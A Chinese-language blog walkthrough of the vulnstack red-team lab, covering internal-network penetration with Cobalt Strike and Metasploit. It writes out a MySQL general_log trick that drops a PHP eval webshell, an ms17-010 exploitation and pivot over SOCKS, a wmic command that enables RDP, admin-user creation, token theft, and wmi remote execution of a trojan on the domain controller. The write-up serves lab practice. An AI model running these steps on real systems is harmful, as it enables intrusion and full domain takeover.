内网渗透(CS与MSF联动) ATT&CK实战系列一红队实战(一)

靶场下载地址:

http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

拓扑图

环境配置

win7网络配置情况:

外网

 内网域网络

 Win2K3网络配置情况:

内网域网络

 win2008(域控)网络配置情况:

内网域网络

渗透过程

开始之前,先到win7上开启phpstudy

 打开网页,发现是个phpstudy探针

phpstudy是2014的所以不存在后门漏洞

底部有个mysql连接检测,输入root,root即可连接成功

 

 尝试连接数据库,不允许对外访问

 爆破目录

有phpmyadmin

 登入后台直接写shell

show variables like '%general%'; 
set global general_log = on; 
set global general_log_file = 'C:/phpstudy/www/0kam1.php'; 
set @a = '<?php eval($_POST["0kam1"]);?>';

 

 上蚁剑

 CS上线

建好监听器后直接web投递(不行就手动投递)

生成木马直接扔蚁剑上,然后运行

成功上线

执行ipconfig命令可以发现一个10.10.10.0的网段

 存活主机探测

 

 对10.10.10.154进行端口扫描

 发现开启了445端口,尝试扫描ms17-010漏洞

开启socks代理

 配置一下proxychains4代理,用proxychains4启动msf

 扫描结果显示存在ms17_010漏洞

 漏洞利用

成功执行ipconfig

开启3389 

set command 'wmic path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1'

 运行netstat -an命令

访问通过socks访问远程桌面

我们还需要创建一个用户,这里为了方便起见,使用 windows/smb/ms17_010_psexec 模块进行

payload需要使用 windows/shell/bind_tcp,如果使用windows/meterpreter/bind_tcp无法获取到sessions

获取到cmd后创建用户并加入管理员组

 输入刚刚创建的账号密码登入成功

CS转发上线

 

 生成木马

这里win7是台web,可以把木马直接放服务器上

再win2k3上下载木马并运行

 成功上线

 执行命令

net config workstation

发现存在GOD域

 定位域控IP,查看dns

ipconfig /all

 查看进程

ps

 发现存在GOD\Administrator账号的进程

窃取进程令牌

steal_token [PID]

以GOD\Administrator权限运行木马

 remote-exec wmi 10.10.10.154 C:\Documents and Settings\okami\Desktop\shell.exe

 使用GOD\Administrator权限的回话,将木马上传到域控

shell copy shell.exe \\10.10.10.153\c$

 执行域控上的木马

remote-exec wmi 10.10.10.153 C:\shell.exe

 成功获取到域控权限

  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值